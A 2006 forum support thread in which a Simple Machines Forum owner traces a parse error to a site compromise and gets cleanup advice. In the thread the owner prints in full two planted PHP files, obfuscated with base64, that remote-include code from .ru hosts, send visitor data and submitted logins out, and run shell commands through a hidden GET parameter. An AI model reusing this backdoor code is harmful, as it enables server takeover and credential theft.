Uutiset:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu
Advertisement:

Error Parse error: syntax error, unexpected $end in index.php

Aloittaja PioneeR, kesäkuu 24, 2006, 03:35:33 AP

« edellinen - seuraava »
Tulosta
Siirry alas Sivuja1
Käyttäjän toimet

PioneeR

kesäkuu 24, 2006, 03:35:33 AP
Not touched the board in ages.. now I get this error??

Parse error: syntax error, unexpected $end in /home/***/public_html/yabbse/index.php on line 213

Any ideas??

Thanks

jerm

#1
kesäkuu 24, 2006, 03:48:20 AP
version of smf?
mods installed?

PioneeR

#2
kesäkuu 24, 2006, 09:21:42 AP
Sorry forgot about that.. 1.07. Just got shoutbox and online users.

Was fine lastnight, got a few emails today from various members this morning saying about this error?

PioneeR

#3
kesäkuu 24, 2006, 09:36:09 AP
www.otf.org.uk/yabbse is the address of my board. (forgot that too!)

zosont

#4
kesäkuu 24, 2006, 10:00:54 AP
Almost impossible to debug that kind of error message without going through the source commenting out blocks of code to see where the problem is arrising.

PioneeR

#5
kesäkuu 24, 2006, 10:03:37 AP
Hi,
Just had a look, and it seems a load of files where 'updated' at the time this error started.
Going to try a restore  :D

GTSdll

#6
kesäkuu 24, 2006, 10:11:27 AP
reminds me of this thread

http://www.tinyportal.net/smf/index.php?topic=5856.0 [nofollow]

Maybe you have the same host?
---> GTSdll Homepage [nofollow] <---

PioneeR

#7
kesäkuu 24, 2006, 10:13:06 AP
Just looked thru these updated files. Looks like they have been truncated. Quite a few in various subdirectories too.

Will have a look at the above link.

PioneeR

#8
kesäkuu 24, 2006, 10:21:35 AP
Just been trying to replace the odd file with the default SimpleMachines one. It looks like a load of .php have been truncated almost chopped in half?!

Very odd indeed. Looks like it happened just before 1am this morning.

In my tmp directory I have two files too (again created at the same time)..

create.php

Koodi [Valitse]
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

and

base.php

Koodi [Valitse]
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l="base64_encode($_POST["l"]) ."&p="base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l="$_POST["l"] ."&p="$_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u"ip2long(getenv(REMOTE_ADDR))) ."&url="base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Anything to do with my problems??

GTSdll

#9
kesäkuu 24, 2006, 10:42:59 AP
That code looks pretty suspicious.

It seems to try contacting another remote php script (http://bis.iframe.ru/master.php [nofollow]) with some arguments.
(like REMOTE_ADDR, SERVER_NAME & $user_auth)

* GTSdll suspects a hacking attempt.
---> GTSdll Homepage [nofollow] <---

winrules

#10
kesäkuu 24, 2006, 11:06:43 AP
Delete those files immediatally, clear out the bad code from your .htaccess files, and reupload all SMF files. You should also change all passwords. More information can be found here.


winrules
SMF Developer
               
My Mods
Please do not PM me for support.

PioneeR

#11
kesäkuu 24, 2006, 12:54:35 IP
Hi,
Have just gone thru zapping any files that were changed at around 1am this morning.

Changed password.

Changed perms on folders (been set to read/write/exec!)

Requested restore from host.

Thanks for all your help!

PioneeR

#12
kesäkuu 24, 2006, 01:09:34 IP
how did they get in?

Havent been hacked before :(

winrules

#13
kesäkuu 24, 2006, 01:28:28 IP
Lainaus käyttäjältä: PioneeR - kesäkuu 24, 2006, 01:09:34 IP
how did they get in?

Havent been hacked before :(
I don't really know how it's getting in. I doesn't seem to be an issue with SMF though, since there are other reports of it with people not using SMF.


winrules
SMF Developer
               
My Mods
Please do not PM me for support.

PioneeR

#14
kesäkuu 24, 2006, 01:36:16 IP
Yeah, I read about all kinds of scripts being infected. Doesnt look good though :(

My forum is back up now though :)

PioneeR

#15
kesäkuu 24, 2006, 08:05:25 IP
Another site has been hit.. this time a mambo one :(

At least I know what to do this time!
Tulosta
Siirry ylös Sivuja1
Käyttäjän toimet
Advertisement: